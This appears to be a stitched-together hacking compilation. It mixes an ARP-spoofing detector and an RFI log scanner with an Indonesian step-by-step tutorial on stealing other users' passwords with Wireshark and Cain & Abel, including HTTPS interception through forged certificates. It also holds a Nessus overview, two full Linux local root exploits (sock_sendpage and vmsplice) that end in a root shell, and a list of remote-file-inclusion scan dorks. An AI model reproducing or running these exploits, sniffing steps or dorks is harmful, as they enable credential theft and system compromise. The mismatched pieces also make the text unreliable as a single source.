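    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != 0x0806:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None                      # not Ethernet/IPv4 ARP
    return {
        "eth_src": _mac(frame[6:12]),
        "oper": oper,                    # 1 = request, 2 = reply
        "sha": _mac(frame[22:28]),       # sender hardware address
        "spa": _ip(frame[28:32]),        # sender protocol address
        "tpa": _ip(frame[38:42]),
    }


class ArpWatch:
    """Tracks IP->MAC bindings; the first binding seen is the baseline."""

    def __init__(self):
        self.ip_to_mac = {}
        self.mac_to_ips = defaultdict(set)

    def observe(self, frame):
        alerts = []
        arp = parse_arp(frame)
        if arp is None:
            return alerts
        if arp["eth_src"] != arp["sha"]:
            # Frame header and ARP payload disagree about who is speaking.
            alerts.append(("src-mismatch", arp["spa"], arp["eth_src"]))
        if arp["spa"] == "0.0.0.0":
            return alerts                # ARP probe: claims no address yet
        known = self.ip_to_mac.get(arp["spa"])
        if known is not None and known != arp["sha"]:
            alerts.append(("binding-changed", arp["spa"], arp["sha"]))
        self.mac_to_ips[arp["sha"]].add(arp["spa"])
        if len(self.mac_to_ips[arp["sha"]]) > 1:
            # Can be legitimate (proxy ARP, multi-homed hosts): triage it.
            alerts.append(("multi-ip", arp["spa"], arp["sha"]))
        self.ip_to_mac.setdefault(arp["spa"], arp["sha"])
        return alerts


# --- constructed sample traffic -----------------------------------------
def arp_frame(eth_src, oper, sha, spa, tha, tpa, eth_dst="ff:ff:ff:ff:ff:ff"):
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    ip = lambda s: bytes(int(o) for o in s.split("."))
    return (mac(eth_dst) + mac(eth_src) + struct.pack("!H", 0x0806)
            + struct.pack("!HHBBH", 1, 0x0800, 6, 4, oper)
            + mac(sha) + ip(spa) + mac(tha) + ip(tpa))


GW, HOST, OTHER = "aa:aa:aa:00:00:01", "aa:aa:aa:00:00:10", "aa:aa:aa:00:00:66"
ZERO = "00:00:00:00:00:00"
SAMPLE = [
    arp_frame(GW, 2, GW, "192.168.1.1", HOST, "192.168.1.10"),       # baseline
    arp_frame(HOST, 1, HOST, "192.168.1.10", ZERO, "192.168.1.1"),   # baseline
    arp_frame(OTHER, 1, OTHER, "192.168.1.66", ZERO, "192.168.1.1"), # baseline
    arp_frame(OTHER, 2, OTHER, "192.168.1.1", HOST, "192.168.1.10"), # forged
    arp_frame(OTHER, 2, OTHER, "192.168.1.10", GW, "192.168.1.1"),   # forged
    arp_frame(OTHER, 2, GW, "192.168.1.1", HOST, "192.168.1.10"),    # header lie
    arp_frame(HOST, 1, HOST, "0.0.0.0", ZERO, "192.168.1.10"),       # ARP probe
]


def run_sample():
    watch = ArpWatch()
    return [alert for frame in SAMPLE for alert in watch.observe(frame)]


if __name__ == "__main__":
    for kind, ip, mac in run_sample():
        print(f"{kind:16} ip={ip:14} mac={mac}")
```

On a managed switch the same signal is enforced rather than just observed by features such as Dynamic ARP Inspection, which drop replies that contradict the DHCP snooping table.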

Kelebihan:
* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya
terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:
* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan
termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:
* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:

Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di
jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:
http://www.wireshark.org/download.html
http://www.oxid.it/cain.html

How to use Wireshark:
* Run Wireshark
* Press Ctrl+k (click Capture, then Options)
* Make sure the Interface is the Ethernet card that connects you to the network; if not, change it, and also make sure “Capture packets in promiscuous mode” is on
* Click the Start button
* Click the Stop button once you feel sure that a password has come in while the capture was running
* You can see all kinds of packets going in and out of the network (or only on your own computer if your network uses a switch)
* To analyse the data, right-click the data you want to analyse, then click “Follow TCP Stream” and happy analysing (I will not explain how because I can't :D)
* What is certain is that the data contains the information the victim entered into the website and vice versa

The method above only applies if your network is a hub, not a switch.
From the method above you can tell whether your network is a hub or a switch by looking at the IP Source and IP Destination columns. If on every row one of the two is your IP, then your network is certainly a switched network; if not, it is the opposite.

How to use Cain&Abel:
* Using this program is much easier and simpler than using Wireshark, but if you want all the packets that have gone out and come in, you are advised to use Wireshark
* Open Cain
* Click Configure
* Under “Sniffer”, select the Ethernet card you will use
* Under “HTTP Fields”, you must add the username fields and password fields if the ones you want are not in the list.
As an example, if you want to hack a Friendster password you must add the word name to the username fields and password fields; for others you can find them by right-clicking, choosing view source, and looking for the input variables of the website's login and password. The defaults already seem fairly complete; you can steal passwords on klubmentari without adding anything.
* After that, apply the settings and click OK
* The main menu has 8 tabs, and only 1 will be covered, the “Sniffer” tab, so select that tab and do not move away from it, to avoid confusing yourself
* Activate the sniffer by clicking the sniffer button above the tabs; look for the button labelled “Start/Stop Sniffer”
* If you are on a hub network, you can now see the passwords coming in by clicking the “Passwords” tab (this time the tab at the bottom, not the one in the middle; the one in the middle no longer needs to be clicked)
* You only need to choose which connection's password you want to see; it will already be listed there
* If it turns out you are on a switched network, this takes more effort: you must activate APR, whose button is to the right of Sniffer (and this is not guaranteed to work, because the management of a switch is far more complete and secure than a hub's)
* Before activating it, on the lower part of the Sniffer tab select APR
* You will see 2 lists that are still empty; click the upper empty list, then click the “+” button (it looks like that) in the row of buttons with Sniffer, APR, etc.
* There will be 2 fields containing all the hosts on your network
* Link the victim's IP address and the IP address of the gateway server (to find the gateway address, click Start on your computer, choose Run, type cmd, then type ipconfig at the command prompt)
* After that, activate APR, and all data from the victim's computer to the server can be seen in the same way.

You can run both programs above at the same time (Cain for APR and Wireshark for packet sniffing) if you want the best results.

The passwords you can steal are passwords on HTTP servers (servers that are not encrypted); if the data is on an encrypted server, you must decrypt the data before you can obtain the password (and that takes far more steps than this hack).

Terms you do not understand can be looked up on Wikipedia (the English one, though; the Indonesian one may not have them).

Additional Material:

For those who can already do APR: if you want to steal passwords via HTTPS, this is how (using klikbca as the example; I have never actually tried it, I only read it in a book):

* Activate APR against the victim's computer
* When the victim goes to klikbca, APR automatically creates a fake certificate so that the transmitted data is no longer encrypted (this causes more certificate warnings on the victim's computer, but if they don't pay much attention it will go unnoticed)
* The fake certificate will appear in the https field in Cain
* After the victim logs in, look at the log in the https section, right-click and choose view
* From that data you can find the victim's login password (look around yourself, you'll find it).
Go ahead and try it; if it works, don't forget to share it here… :D
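Seen from the defender's side, the APR step described above leaves a clear trace: the gateway's IP address suddenly resolves to a different MAC, and that same MAC also answers for another host. The Python below is an added example, not part of the original post; the log format, addresses and function names are assumptions constructed for illustration.

```python
"""Passive check for ARP poison routing: flag IP-to-MAC bindings that change
and any MAC that answers for the gateway's IP plus another host's IP."""
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample, one observed ARP reply per line:
#   <epoch-seconds> <sender-ip> is-at <sender-mac>
# Assumed sensor format; addresses are documentation / locally administered values.
SAMPLE_LOG = """\
1000 192.0.2.1 is-at 02:00:00:00:00:01
1001 192.0.2.10 is-at 02:00:00:00:00:10
1002 192.0.2.66 is-at 02:00:00:00:00:66
1030 192.0.2.1 is-at 02:00:00:00:00:66
1031 192.0.2.10 is-at 02:00:00:00:00:66
1032 192.0.2.1 is-at 02-00-00-00-00-66
1060 192.0.2.1 is-at 02:00:00:00:00:01
# lines that do not parse are skipped
1061 not-an-ip is-at 02:00:00:00:00:01
1062 192.0.2.10 is-at zz:zz
"""

MAC_RE = re.compile(r"^[0-9a-f]{2}(:[0-9a-f]{2}){5}$")


@dataclass(frozen=True)
class Alert:
    ts: int
    kind: str       # "binding-changed" or "gateway-mac-shared"
    ip: str
    old_mac: str    # empty for "gateway-mac-shared"
    new_mac: str


def parse_log(text):
    """Return (ts, ip, mac) tuples; malformed lines are dropped, MACs normalised."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2] != "is-at":
            continue
        mac = parts[3].lower().replace("-", ":")
        try:
            ts = int(parts[0])
            ip = str(ipaddress.ip_address(parts[1]))
        except ValueError:
            continue
        if MAC_RE.match(mac):
            events.append((ts, ip, mac))
    return events


def detect(events, gateway_ip):
    """Walk the replies in time order and collect alerts.

    Benign causes exist (DHCP lease reuse, a NIC swap, a router that owns
    several addresses), so an alert is a lead to triage, not proof.
    """
    last = {}        # ip -> MAC most recently announced for it
    flagged = set()  # MACs already reported as sharing the gateway's address
    alerts = []
    for ts, ip, mac in sorted(events):
        old = last.get(ip)
        last[ip] = mac
        if old is not None and old != mac:
            alerts.append(Alert(ts, "binding-changed", ip, old, mac))
        gw_mac = last.get(gateway_ip)
        if gw_mac is None or gw_mac in flagged:
            continue
        # Does the MAC currently bound to the gateway also claim another IP?
        others = [i for i, m in last.items() if m == gw_mac and i != gateway_ip]
        if others:
            flagged.add(gw_mac)
            alerts.append(Alert(ts, "gateway-mac-shared", gateway_ip, "", gw_mac))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_log(SAMPLE_LOG), "192.0.2.1"):
        print(alert)
```

On managed switches, Dynamic ARP Inspection with DHCP snooping blocks the forged replies outright; a passive check like this is for networks where that is not available.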

Nessus

In typical operation, Nessus begins by doing a port scan with one of its four internal portscanners (or it can optionally use Amap or Nmap) to determine which ports are open on the target and then tries various exploits on the open ports. The vulnerability tests, available as subscriptions, are written in NASL (Nessus Attack Scripting Language), a scripting language optimized for custom network interaction.

Tenable Network Security produces several dozen new vulnerability checks (called plugins) each week, usually on a daily basis. These checks are available for free to the general public; commercial customers are not allowed to use this Home Feed any more. The Professional Feed (which is not free) also gives access to support and additional scripts (audit and compliance tests...).

Optionally, the results of the scan can be reported in various formats, such as plain text, XML, HTML and LaTeX. The results can also be saved in a knowledge base for debugging. On UNIX, scanning can be automated through the use of a command-line client. There exist many different commercial, free and open source tools for both UNIX and Windows to manage individual or distributed Nessus scanners.

If the user chooses to do so (by disabling the option 'safe checks'), some of Nessus's vulnerability tests may try to cause vulnerable services or operating systems to crash. This lets a user test the resistance of a device before putting it in production.

Nessus provides additional functionality beyond testing for known network vulnerabilities. For instance, it can use Windows credentials to examine patch levels on computers running the Windows operating system, and can perform password auditing using dictionary and brute force methods. Nessus 3 and later can also audit systems to make sure they have been configured per a specific policy, such as the NSA's guide for hardening Windows servers.

The "Nessus" Project was started by Renaud Deraison in 1998 to provide to the Internet community a free remote security scanner. On October 5, 2005, Tenable Network Security, the company Renaud Deraison co-founded, changed Nessus 3 to a proprietary (closed source) license. The Nessus 3 engine is still free of charge, though Tenable charges $100/month per scanner for the ability to perform configuration audits for PCI, CIS, FDCC and other configuration standards, technical support, SCADA vulnerability audits, the latest network checks and patch audits, the ability to audit anti-virus configurations and the ability for Nessus to perform sensitive data searches to look for credit card, social security number and many other types of corporate data.

In July of 2008, Tenable sent out a revision of the feed license which will allow home users full access to plugin feeds.[5] A professional license is available for commercial use.

The Nessus 2 engine and a minority of the plugins are still GPL, leading to forked open source projects based on Nessus like OpenVAS and Porz-Wahn. Tenable Network Security has still maintained the Nessus 2 engine and has updated it several times since the release of Nessus 3.

Nessus 3 is available for many different UNIX and Windows systems, offers patch auditing of UNIX and Windows hosts without the need for an agent and is 2-5 times faster than Nessus 2.


Linux sock_sendpage

/*
* Linux sock_sendpage() NULL pointer dereference
* Copyright 2009 Ramon de Carvalho Valle
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/

/*
* This exploit was written to illustrate the exploitability of this
* vulnerability[1], discovered by Tavis Ormandy and Julien Tinnes, on ppc
* and ppc64.
*
* This exploit makes use of the SELinux and the mmap_min_addr problem to
* exploit this vulnerability on Red Hat Enterprise Linux 5.3 and CentOS 5.3.
* The problem, first noticed by Brad Spengler, was described by Red Hat in
* Red Hat Knowledgebase article: Security-Enhanced Linux (SELinux) policy and
* the mmap_min_addr protection[2].
*
* Support for i386 and x86_64 was added for completeness. For a more complete
* implementation, refer to Brad Spengler's exploit[3], which also implements
* the personality trick[4] published by Tavis Ormandy and Julien Tinnes.
*
* Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
* are vulnerable.
*
* This exploit was tested on:
*
* CentOS 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* CentOS 5.3 (2.6.18-128.4.1.el5)
* CentOS 5.3 (2.6.18-128.2.1.el5)
* CentOS 5.3 (2.6.18-128.1.16.el5)
* CentOS 5.3 (2.6.18-128.1.14.el5)
* CentOS 5.3 (2.6.18-128.1.10.el5)
* CentOS 5.3 (2.6.18-128.1.6.el5)
* CentOS 5.3 (2.6.18-128.1.1.el5)
* CentOS 5.3 (2.6.18-128.el5)
* CentOS 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* CentOS 4.8 (2.6.9-89.0.7.EL)
* CentOS 4.8 (2.6.9-89.0.3.EL)
* CentOS 4.8 (2.6.9-89.EL)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* Red Hat Enterprise Linux 5.3 (2.6.18-128.4.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.2.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.16.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.14.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.10.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.6.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.el5)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.7.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.3.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.EL)
* SUSE Linux Enterprise Server 11 (2.6.27.19-5)
* SUSE Linux Enterprise Server 10 SP2 (2.6.16.60-0.21)
* Ubuntu 8.10 (2.6.27-14) is not vulnerable
* Ubuntu 8.10 (2.6.27-11)
* Ubuntu 8.10 (2.6.27-9)
* Ubuntu 8.10 (2.6.27-7)
*
* For i386 and ppc, compile with the following command:
* gcc -Wall -o linux-sendpage linux-sendpage.c
*
* And for x86_64 and ppc64:
* gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
*
* [1] http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html
* [2] http://kbase.redhat.com/faq/docs/DOC-18042
* [3] http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz
* [4] http://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html
*/


Linux kernel 2.4/2.6

/*
**
** 0x82-CVE-2009-2692
** Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)
** Tested RedHat Linux 9.0, Fedora core 4~11, Whitebox 4, CentOS 4.x.
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** spender and venglin's code is very excellent.
** Thankful to them.
**
** Greets: Brad Spengler ,
** Przemyslaw Frasunek .
** --
** exploit by .
**
** "Slow and dirty exploit for this one"
**
*/

#include
#include
#include
#include
#include
#include

unsigned int uid, gid;

void kernel_code()
{
unsigned long where=0;
unsigned long *pcb_task_struct;

where=(unsigned long )&where;
where&=~8191;
pcb_task_struct=(unsigned long *)where;

while(pcb_task_struct){
if(pcb_task_struct[0]==uid&&pcb_task_struct[1]==uid&&
pcb_task_struct[2]==uid&&pcb_task_struct[3]==uid&&
pcb_task_struct[4]==gid&&pcb_task_struct[5]==gid&&
pcb_task_struct[6]==gid&&pcb_task_struct[7]==gid){
pcb_task_struct[0]=pcb_task_struct[1]=pcb_task_struct[2]=pcb_task_struct[3]=0;
pcb_task_struct[4]=pcb_task_struct[5]=pcb_task_struct[6]=pcb_task_struct[7]=0;
break;
}
pcb_task_struct++;
}
return;
/*
** By calling iret after pushing a register into kernel stack,
** We don't have to go back to ring3(user mode) privilege level. dont worry. :-}
**
** kernel_code() function will return to its previous status which means before sendfile() system call,
** after operating upon a ring0(kernel mode) privilege level.
** This will enhance the viability of the attack code even though each kernel can have different CS and DS address.
*/
}
void *kernel=kernel_code;

int main(int argc,char *argv[])
{
int fd_in=0,fd_out=0,offset=1;
void *zero_page;

uid=getuid();
gid=getgid();
if(uid==0){
fprintf(stderr,"[-] check ur uid\n");
return -1;
}

/*
** There are some cases that we need mprotect due to the dependency matter with SVR4. (however, I did not confirm it yet)
*/
if(personality(0xffffffff)==PER_SVR4){
if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
perror("[-] mprotect()");
return -1;
}
}
else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
perror("[-] mmap()");
return -1;
}
*(char *)0x00000000=0xff;
*(char *)0x00000001=0x25;
*(unsigned long *)0x00000002=(unsigned long)&kernel;
*(char *)0x00000006=0xc3;

if((fd_in=open(argv[0],O_RDONLY))==-1){
perror("[-] open()");
return -1;
}
if((fd_out=socket(PF_APPLETALK,SOCK_DGRAM,0))==-1){
if((fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0))==-1){
perror("[-] socket()");
return -1;
}
}
gogossing:
/*
** Sometimes, the attacks can fail. To enlarge the possibility of attack,
** an attacker can make all the processes running under current user uid 0.
*/
if(sendfile(fd_out,fd_in,&offset,2)==-1){
if(offset==0){
perror("[-] sendfile()");
return -1;
}
close(fd_out);
fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0);
}
if(getuid()==uid){
if(offset){
offset=0;
}
goto gogossing; /* all process */
}
close(fd_in);
close(fd_out);

execl("/bin/sh","sh","-i",NULL);
return 0;
}

/* eoc */

Kernel 2.6.17

/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remember original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}

exit_kernel();
}

void exit_code()
{
if (getuid() != 0)
die("wtf", 0);

printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}

int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];

uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);

printf("-----------------------------------\n");
printf(" Linux vmsplice Local Root Exploit\n");
printf(" By qaaz\n");
printf("-----------------------------------\n");

if (!uid || !gid)
die("!@#$", 0);

/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);

pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);

pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);

/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);

/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);

iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;

signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}


Bug&dork New

.scan /index.php?_SERVER[DOCUMENT_ROOT]= “powered by Clicknet CMS”
.scan /include/admin.lib.inc.php?site_path= “rgboard
.scan /header.php?base_folder= “Powered by Bab.stats”
.scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path= “/index.php?option=com_content”
.scan /admin.php?include_path= “Guestbook”
.scan //main.php?_zb_path= “main.php”
.scan //login.php?_zb_path= “login.php”
.scan /////?_SERVER[DOCUMENT_ROOT]= “/board” site:.kr
.scan /admin.php?include_path= “gastenboek”
.scan /docebo/doceboLms//class/class.dashboard_lms.php?where_framework= “doceboLms”
.scan /encapscms_PATH/core/core.php?root= “encapscms 0.3.6″ “encapscms 0.3.6″
.scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= “/PNphpBB2/”
.scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= “PHP-NUKE”
.scan /s_loadenv.inc.php?DOCUMENT_ROOT= “netcat require”
.scan /index.php?DOCUMENT_ROOT= “netcat_files”
.scan /ray.3.5/modules/global/inc/content.inc.php?sIncPath= “boonex”
.scan /?page= /?pagedb=?
.scan ?sourcedir= index.php?sourcedir=
.scan /security/include/_class.security.php?PHPSECURITYADMIN_PATH= “web3news”
.scan /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath= “/plugins/sniplets/”
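Seen from the web server's side, each .scan line above turns into requests in which the listed parameter is set to a remote URL (the bot's RFI response file), and the LFI variants carry long ../ chains. The Python below is an added example, not code from the page; the log lines, hosts and function names are constructed for illustration, and the optional allowlist of URL-carrying parameters is an assumption about the site being monitored.

```python
"""Flag remote/local file inclusion probes in web access logs."""
import re
from collections import Counter
from typing import NamedTuple
from urllib.parse import parse_qsl, unquote

# Constructed combined-format log lines; hosts are documentation addresses.
SAMPLE_LOG = r'''
203.0.113.7 - - [10/Dec/2009:10:00:01 +0000] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://files.example.net/id.txt?? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.7 - - [10/Dec/2009:10:00:02 +0000] "GET /admin.php?include_path=http%3A%2F%2Ffiles.example.net%2Fid.txt%3F HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
203.0.113.7 - - [10/Dec/2009:10:00:03 +0000] "GET //main.php?_zb_path=http://files.example.net/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
198.51.100.4 - - [10/Dec/2009:10:00:05 +0000] "GET /index.php?page=/../../../../../../../../etc/passwd HTTP/1.1" 200 1480 "-" "Mozilla/5.0"
192.0.2.33 - - [10/Dec/2009:10:00:09 +0000] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
192.0.2.33 - - [10/Dec/2009:10:00:12 +0000] "GET /out.php?next=/account/home HTTP/1.1" 302 0 "-" "Mozilla/5.0"
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)
TRAVERSAL_RE = re.compile(r'(?:\.\.[/\\]){2,}')


class Finding(NamedTuple):
    ip: str
    status: int
    param: str
    kind: str   # "rfi" or "lfi"


def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding (bounded), so %253A still ends up as ':'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(target, url_params=frozenset()):
    """Return [(param, kind)] for one request target.

    The query is split off by hand: targets such as //main.php would be
    misread as a host name by a generic URL parser.
    url_params names parameters that legitimately carry URLs (assumed allowlist).
    """
    _, _, query = target.partition("?")
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = fully_unquote(value)
        if REMOTE_RE.match(value):
            if name not in url_params:
                hits.append((name, "rfi"))
        elif TRAVERSAL_RE.search(value):
            hits.append((name, "lfi"))
    return hits


def scan(log_text, url_params=frozenset()):
    """Return one Finding per suspicious parameter, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        for param, kind in classify(target, url_params):
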